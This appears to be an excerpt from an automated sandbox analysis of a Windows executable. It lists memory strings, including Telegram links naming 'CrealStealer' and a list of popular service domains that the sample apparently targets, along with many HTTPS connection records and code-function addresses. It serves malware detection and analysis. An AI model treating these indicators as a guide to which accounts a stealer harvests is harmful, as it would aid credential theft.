Source: HyZh4pn0RF.exe, 00000002.00000003.1812755836.000002539B1B6000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1824647034.000002539B1B6000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1500341869.000002539A96D000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1809487444.000002539B1AF000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1791039518.000002539B1A5000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1498180126.000002539A96D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://setuptools.pypa.io/en/latest/pkg_resources.html#basic-resource-access
Source: HyZh4pn0RF.exe, 00000002.00000002.1824412747.000002539B0A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packages
Source: HyZh4pn0RF.exe, 00000002.00000002.1824412747.000002539B0A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packages0
Source: HyZh4pn0RF.exe, 00000002.00000002.1826596041.000002539B9A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://spotify.com)
Source: HyZh4pn0RF.exe, 00000002.00000003.1783432003.000002539B1E5000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1796923552.000002539B1F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spotify.com)z
Source: HyZh4pn0RF.exe, 00000002.00000002.1826596041.000002539B9A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://steam.com)
Source: HyZh4pn0RF.exe, 00000002.00000003.1783432003.000002539B1E5000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1796923552.000002539B1F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steam.com)z
Source: HyZh4pn0RF.exe, 00000002.00000003.1784174727.000002539B471000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/CrealStealer
Source: HyZh4pn0RF.exe, 00000002.00000002.1826596041.000002539B9A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://t.me/CrealStealer2
Source: HyZh4pn0RF.exe, 00000002.00000002.1826596041.000002539B9A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://telegram.com)
Source: HyZh4pn0RF.exe, 00000002.00000003.1783432003.000002539B1E5000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1796923552.000002539B1F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://telegram.com)z
Source: HyZh4pn0RF.exe, 00000002.00000002.1826596041.000002539B9A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://tiktok.com)
Source: HyZh4pn0RF.exe, 00000002.00000003.1783432003.000002539B1E5000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1796923552.000002539B1F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiktok.com)z
Source: HyZh4pn0RF.exe, 00000002.00000003.1786935489.000002539A830000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1808788736.000002539A830000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1810105340.000002539A831000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1806437691.000002539A830000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
Source: HyZh4pn0RF.exe, 00000002.00000003.1807654238.000002539A382000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1790955383.000002539A34C000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1793434238.000002539A5FB000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1788652033.000002539B2FE000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1811309519.000002539A5FD000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1811817866.000002539A5FD000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1821619779.000002539A5FD000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1788235967.000002539A2D4000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1825189021.000002539B2E2000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1805946201.000002539A5FC000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1809054810.000002539B2CE000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1790429949.000002539A2FD000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1788053282.000002539A2D2000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1788652033.000002539B2CE000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1807578063.000002539A35A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc3610
Source: HyZh4pn0RF.exe, 00000002.00000003.1812755836.000002539B1B2000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1809487444.000002539B1AF000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1791039518.000002539B1A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc5297
Source: HyZh4pn0RF.exe, 00000002.00000003.1813334396.000002539A88E000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1811638590.000002539A88E000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1809820155.000002539A86C000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1786935489.000002539A830000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1787579799.000002539A86B000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1815848973.000002539A890000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc7231#section-4.3.6)
Source: HyZh4pn0RF.exe, 00000002.00000002.1826596041.000002539B9A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://twitch.com)
Source: HyZh4pn0RF.exe, 00000002.00000003.1783432003.000002539B1E5000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1796923552.000002539B1F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://twitch.com)z
Source: HyZh4pn0RF.exe, 00000002.00000002.1826596041.000002539B9A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://twitter.com)
Source: HyZh4pn0RF.exe, 00000002.00000003.1783432003.000002539B1E5000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1796923552.000002539B1F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://twitter.com)z
Source: HyZh4pn0RF.exe, 00000002.00000003.1796799317.000002539A94D000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1791344985.0000025399E41000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1794230363.0000025399E5C000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1788452258.0000025399E01000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1789039772.0000025399E3B000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1788827650.000002539A948000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1786519721.000002539A946000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1791228515.000002539A94C000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1806888317.000002539A951000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1808692623.000002539A952000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1823091900.000002539A952000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1790369328.0000025399E40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://twitter.com/
Source: HyZh4pn0RF.exe, 00000002.00000002.1826596041.000002539B9A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://uber.com)
Source: HyZh4pn0RF.exe, 00000002.00000003.1783432003.000002539B1E5000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1796923552.000002539B1F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://uber.com)z
Source: HyZh4pn0RF.exe, 00000002.00000002.1823330103.000002539A999000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1788973339.000002539A996000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1807987225.000002539A996000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1786519721.000002539A996000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1808509453.000002539A997000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
Source: HyZh4pn0RF.exe, 00000002.00000003.1786935489.000002539A8B2000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1789185298.000002539A8DE000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1797612204.000002539A8E0000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1498852357.000002539A8B2000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1787535604.000002539A8D2000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1498140465.000002539B1C5000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1500555282.000002539A8B2000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1497976070.000002539A987000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1822917552.000002539A8E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www-cs-faculty.stanford.edu/~knuth/fasc2a.ps.gz
Source: HyZh4pn0RF.exe, 00000002.00000002.1824991617.000002539B29B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ietf.org/rfc/rfc2898.txt
Source: HyZh4pn0RF.exe, 00000000.00000003.1475480253.0000027ADD238000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1838524054.00007FFBAB7CF000.00000002.00000001.01000000.00000010.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1833750878.00007FFBAABDA000.00000002.00000001.01000000.00000011.sdmp	String found in binary or memory: https://www.openssl.org/H
Source: HyZh4pn0RF.exe, 00000002.00000003.1808967495.000002539A9D0000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1797847362.000002539A9CB000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1786519721.000002539A996000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1787476794.000002539A9CA000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1805386780.000002539A9CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.python.org
Source: HyZh4pn0RF.exe, 00000002.00000003.1796799317.000002539A95A000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1500341869.000002539A92C000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1788827650.000002539A948000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1786519721.000002539A946000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1808079169.000002539A95A000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1791228515.000002539A94C000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1809402925.000002539A95C000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1500185747.000002539A997000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.python.org/
Source: HyZh4pn0RF.exe, 00000002.00000002.1818871820.0000025399CB0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
Source: HyZh4pn0RF.exe, 00000002.00000002.1834739735.00007FFBAB16C000.00000008.00000001.01000000.00000004.sdmp	String found in binary or memory: https://www.python.org/psf/license/
Source: HyZh4pn0RF.exe, 00000002.00000002.1834045763.00007FFBAAFF4000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: https://www.python.org/psf/license/)
Source: HyZh4pn0RF.exe, 00000002.00000003.1785215448.000002539B396000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1785802132.000002539B390000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784800845.000002539B395000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784057520.000002539B388000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784529385.000002539B38D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwww.certigna.fr/autorites/
Source: HyZh4pn0RF.exe, 00000002.00000003.1785215448.000002539B396000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784800845.000002539B395000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784057520.000002539B388000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784529385.000002539B38D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwww.certigna.fr/autorites/0
Source: HyZh4pn0RF.exe, 00000002.00000003.1810591741.000002539B335000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1813019488.000002539B329000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwww.certigna.fr/autorites/0m
Source: HyZh4pn0RF.exe, 00000002.00000002.1826596041.000002539B9A0000.00000004.00001000.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1783432003.000002539B1E5000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1796923552.000002539B1F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://xbox.com)
Source: HyZh4pn0RF.exe, 00000002.00000002.1826596041.000002539B9A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://yahoo.com)
Source: HyZh4pn0RF.exe, 00000002.00000003.1783432003.000002539B1E5000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1796923552.000002539B1F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://yahoo.com)z
Source: HyZh4pn0RF.exe, 00000002.00000003.1805597702.000002539A7F4000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1816988653.000002539A250000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1793990847.000002539A244000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1810651244.000002539A800000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1811757531.000002539A245000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1790671676.000002539A21F000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1787795082.000002539A7F4000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1789691864.000002539A7F4000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1813743625.000002539A250000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1792428869.000002539A240000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1820200234.000002539A250000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1795287489.000002539A7F4000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1791160404.000002539A239000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1790549834.000002539A20A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://yahoo.com/
Source: HyZh4pn0RF.exe, 00000002.00000002.1826596041.000002539B9A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com)
Source: HyZh4pn0RF.exe, 00000002.00000003.1783432003.000002539B1E5000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1796923552.000002539B1F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com)z

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 0_2_00007FF78F4A0F38	0_2_00007FF78F4A0F38
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 0_2_00007FF78F497E4C	0_2_00007FF78F497E4C
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 0_2_00007FF78F4A6370	0_2_00007FF78F4A6370
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 0_2_00007FF78F4A72BC	0_2_00007FF78F4A72BC
